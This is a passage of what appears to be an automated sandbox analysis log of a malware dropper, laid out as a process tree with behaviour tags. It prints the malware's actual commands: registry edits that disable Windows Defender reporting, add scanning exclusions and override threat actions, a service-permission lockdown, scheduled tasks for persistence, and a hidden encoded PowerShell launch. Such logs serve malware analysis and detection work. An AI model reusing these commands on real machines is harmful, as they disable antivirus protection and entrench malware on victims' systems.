C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\97Jy8NUogrY6pXmCGwHvApBM.exe"C:\Users\Admin\Pictures\97Jy8NUogrY6pXmCGwHvApBM.exe"3⤵
- Executes dropped EXE
PID:4632
-
-
C:\Users\Admin\Pictures\riNVBxveUPQ1dduMvr5TXg7i.exe"C:\Users\Admin\Pictures\riNVBxveUPQ1dduMvr5TXg7i.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:3320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- Creates scheduled task(s)
PID:3588
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsn5AA5.tmpC:\Users\Admin\AppData\Local\Temp\nsn5AA5.tmp4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4192
-
-
-
C:\Users\Admin\Pictures\ZxIyRlydDx0u0UehgXz9WXlL.exe"C:\Users\Admin\Pictures\ZxIyRlydDx0u0UehgXz9WXlL.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Users\Admin\AppData\Local\Temp\7zS5E1E.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Users\Admin\AppData\Local\Temp\7zS6179.tmp\Install.exe.\Install.exe /tSUWodidgk "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:1912
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵
- Suspicious use of WriteProcessMemory
PID:692
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵
- Suspicious use of WriteProcessMemory
PID:4132 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵
- Suspicious use of WriteProcessMemory
PID:1292
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gezYmBTgd" /SC once /ST 17:44:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:2676
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gezYmBTgd"6⤵PID:4872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gezYmBTgd"6⤵PID:3968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bLyGxHYCYhmZEhkSec" /SC once /ST 23:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\dRWIRjKfRjRPExc\biTSpsE.exe\" A6 /rCsite_idKeJ 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1176
-
-
-
-
-
C:\Users\Admin\Pictures\dzIJg2BJkMR7TCEjqOzWKHfx.exe"C:\Users\Admin\Pictures\dzIJg2BJkMR7TCEjqOzWKHfx.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==3⤵
- Executes dropped EXE
PID:2848
-
-
C:\Users\Admin\Pictures\tha95OBw3Tsn7AWPLsWEDL4y.exe"C:\Users\Admin\Pictures\tha95OBw3Tsn7AWPLsWEDL4y.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Users\Admin\Pictures\tha95OBw3Tsn7AWPLsWEDL4y.exeC:\Users\Admin\Pictures\tha95OBw3Tsn7AWPLsWEDL4y.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2cc,0x2fc,0x6f629530,0x6f62953c,0x6f6295484⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4348
-
-
C:\Users\Admin\Pictures\tha95OBw3Tsn7AWPLsWEDL4y.exe"C:\Users\Admin\Pictures\tha95OBw3Tsn7AWPLsWEDL4y.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1912 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240112233416" --session-guid=cd5d279a-5d60-401e-a835-066439755841 --server-tracking-blob=ZWM3NDkxMjFiZDUxYjUwNzljMDIxNDE5Mzk0ZTJmMjZlY2VmYTRmMjExYzUwMGUwM2IzZjIxNjFkMTUxOTYzYzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNTEwMjQyOC43MTAxIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIxY2FmNmI0Yy02ZTcwLTRmNjgtYjc0YS04ZmI5OGMzYzc5NDkifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=78050000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:2140
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\tha95OBw3Tsn7AWPLsWEDL4y.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\tha95OBw3Tsn7AWPLsWEDL4y.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4320
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122334161\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122334161\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
PID:2852
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122334161\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122334161\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4004
-
-
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:641⤵PID:3980
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:641⤵PID:4724
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:321⤵PID:624
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:321⤵PID:3600
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3568 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3588
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv ZUD4K/AI40KrhQRn86ukzg.0.21⤵PID:3600
-
C:\Users\Admin\Pictures\tha95OBw3Tsn7AWPLsWEDL4y.exeC:\Users\Admin\Pictures\tha95OBw3Tsn7AWPLsWEDL4y.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2e8,0x2ec,0x2fc,0x2bc,0x300,0x6ebb9530,0x6ebb953c,0x6ebb95481⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5472
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5548
-
C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\dRWIRjKfRjRPExc\biTSpsE.exeC:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\dRWIRjKfRjRPExc\biTSpsE.exe A6 /rCsite_idKeJ 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5712 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:4236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:5928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:5956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:5872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:3336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:6060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:5252
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AsRtOTETCNfDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AsRtOTETCNfDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BCDBNUauOckU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BCDBNUauOckU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VjBUDnCPU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VjBUDnCPU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qFmzepOeHSjDLjQlSgR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qFmzepOeHSjDLjQlSgR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qdWBYcETnEUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qdWBYcETnEUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WhKQivtBOjWPJtVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WhKQivtBOjWPJtVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\osszcinDeFgrFwAQ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\osszcinDeFgrFwAQ\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
